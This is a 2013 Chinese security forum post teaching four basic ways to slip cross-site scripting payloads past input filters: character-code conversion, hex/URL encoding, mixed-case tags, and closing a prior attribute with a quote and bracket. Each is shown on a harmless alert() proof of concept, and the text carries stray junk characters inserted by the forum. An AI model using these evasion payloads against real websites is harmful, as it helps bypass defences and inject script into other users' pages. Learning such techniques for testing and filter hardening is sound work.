找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2040|回复: 0
打印 上一主题 下一主题

XSS 绕过技术

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-14 00:10:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
四种超级基础的绕过方法。; M: D5 H5 S4 e$ f
1.转换为ASCII码0 m2 q& [0 R$ R- a4 p
例子:原脚本为<script>alert(‘I love F4ck’)</script >
. ~; O' Y; \% [4 _/ u通过转换,变成:" j/ `4 u; e! a# Z5 g+ n, z) F
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
0 \, X0 O* R/ w( k
, b; Z7 l' S8 D4 {6 y) F8 n6 p2.转换为HEX(十六进制)3 H8 j1 y. }% q) |
例子:原脚本为<script>alert(‘I love F4ck’)</script>
* V/ q- Z0 {* W1 n' @7 p2 U1 K- m# q通过转换,变成:' Y! F% [8 E: O3 D
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
# |( Z2 k; @+ x8 R0 z1 N
6 g3 G3 u5 W2 H. O: J3.转换脚本的大小写& q5 ]1 |8 S- `" t0 _* I
例子:原脚本为<script>alert(‘I love F4ck’)</script>
7 {& q: [6 V4 C- C: [转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>$ G7 a- J; s% x/ r( O

+ s% J- j  S- `: @% Q4.增加闭合标记”>; @. P' y$ |2 C
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 r' `! x; L+ X7 o% U$ U转换为:”><script>alert(‘I love F4ck’)</script>
" X! s3 V4 A; P# e' u更详细绕过技术请参考此网页# b8 E6 T5 f, x- ]4 s% L- U$ A
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+ |0 j' c1 w- d: T
$ q; S* M1 y$ ~转换工具使用的是火狐的 hackbar mozilla addon.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表